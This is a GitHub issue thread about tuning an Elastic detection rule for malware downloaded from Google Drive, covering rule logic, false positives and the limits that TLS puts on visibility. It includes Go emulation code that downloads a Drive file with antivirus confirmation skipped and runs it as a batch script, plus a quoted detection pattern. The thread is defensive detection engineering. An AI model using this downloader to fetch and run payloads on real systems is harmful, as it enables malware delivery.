[Rule Tuning] Google Drive Direct Download Detection

[terrancedejesus]

Link to rule

https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml

Description

This rule has some performance and false-positive considerations that should be addressed. The maxspan is small, however the use of wildcards and OR logic may be too broad and cause performance issues when the first sequence query is collecting events.

Tasks

Preview Give feedback

1. [Tuning] Suspicious File Downloaded from Google Drive #3411
   Area: RAD Rule: Tuning backport: auto +3
   
2. Create a new rule, primarily identifying HTTP requests (so we can have logic on the URI parameters) to that URL
3. Start some digging into new terms for process executable and dns domain combinations to web services and chat platforms (telegram, discord, etc.)

[terrancedejesus]

Related requests to tune this rule:

• [Rule Tuning] Potential Malicious File Downloaded from Google Drive #2980
• [Rule Tuning] Potential Malicious File Downloaded from Google Drive #3078

[terrancedejesus]

Update 01-23-2024

After some initial triage, it appears that direct download links to Google Drive with parameter confirm=no_antivirus may no longer be viable. Although this is submitted, response code 303 is given and redirection to a manual download page is given. Before, it would download the malware directly without the redirection.

While this is the case, the threat of leveraging Google Drive for malware distribution is still prevalent, however, further research and emulation will need to be conducted to properly tune this rule.

Regarding performance, the rule can also be adjusted - specifically with the initial sequence and wildcard usage. Since we have no visibility into the URL requested during the TLS connection, we are unable to write logic on URL parameters. As a result, we must rely on a collection of events with DNS traffic, process and file based events.

Go code to download directly from Google Drive and execute batch script- used for testing:

    "io"
    "net/http"
    "os"
    "os/exec"
)

func main() {
    // Define a command-line flag
    fileID := flag.String("id", "", "Google Drive file ID")
    flag.Parse()

    // Check if the file ID is provided
    if *fileID == "" {
        fmt.Println("Please provide a Google Drive file ID using -id flag.")
        os.Exit(1)
    }

    filename := "downloaded_script.bat"
    fileURL := fmt.Sprintf("https://drive.google.com/uc?export=download&id=%s&confirm=no_antivirus", *fileID)
    err := downloadFile(filename, fileURL)
    if err != nil {
        panic(err)
    }
    fmt.Println("File downloaded successfully")

    // Execute the file
    err = executeBatchFile(filename)
    if err != nil {
        panic(err)
    }
    fmt.Println("Batch file executed successfully")
}

// downloadFile will download a url to a local file.
func downloadFile(filepath string, url string) error {
    // Get the data
    resp, err := http.Get(url)
    if err != nil {
        return err
    }
    defer resp.Body.Close()

    // Create the file
    out, err := os.Create(filepath)
    if err != nil {
        return err
    }
    defer out.Close()

    // Write the body to file
    _, err = io.Copy(out, resp.Body)
    return err
}

// executeBatchFile executes a .bat file.
func executeBatchFile(filepath string) error {
    cmd := exec.Command("cmd", "/C", filepath)
    cmd.Stdout = os.Stdout
    cmd.Stderr = os.Stderr
    return cmd.Run()
}

[rheimsothdecoit]

Be aware that this OR after the first block makes nearly always the following parts useless, e.g. in our environment event.action is always "load".

Please check if instead of the "or" "and" would be correct.

/* Look for processes started or libraries loaded from untrusted or unsigned Windows, Linux or macOS binaries */
(event.action in ("exec", "fork", "start", "load")) or

/* Look for Google Drive download URL with AV flag skipping */
(process.args : "*drive.google.com*" and process.args : "*export=download*" and process.args : "*confirm=no_antivirus*")

...

Also the benign process list does not contain firefox and chrome binaries on linux machines, only the windows parts.

...
 and not process.executable:
        ("/bin/terraform",
        "*/bin/dockerd",
        "/usr/local/bin/docker-init",
        "*/bin/go",
        "?:\\Program Files*\\Mozilla Firefox\firefox.exe",
        "?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe")
...

[terrancedejesus]

Update 02-01-2024

After some research and discussion, we have expanded the scope of this rule tuning issue. We will be decoupling some of the activity attempted to be identified with the original rule, as well as creating new rules to detect similar activity.

Details can be found in the tuning pull request: #3411 (comment)

A tasklist has been added at the top of this tuning to add additional scope.

[botelastic]

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

[terrancedejesus]

Closing this issue. Original tuning has been completed. Further investigation revealed that HTTPS and TLS are used for making connections to Google Drive by default and thus we do not have proper visibility via existing integrations.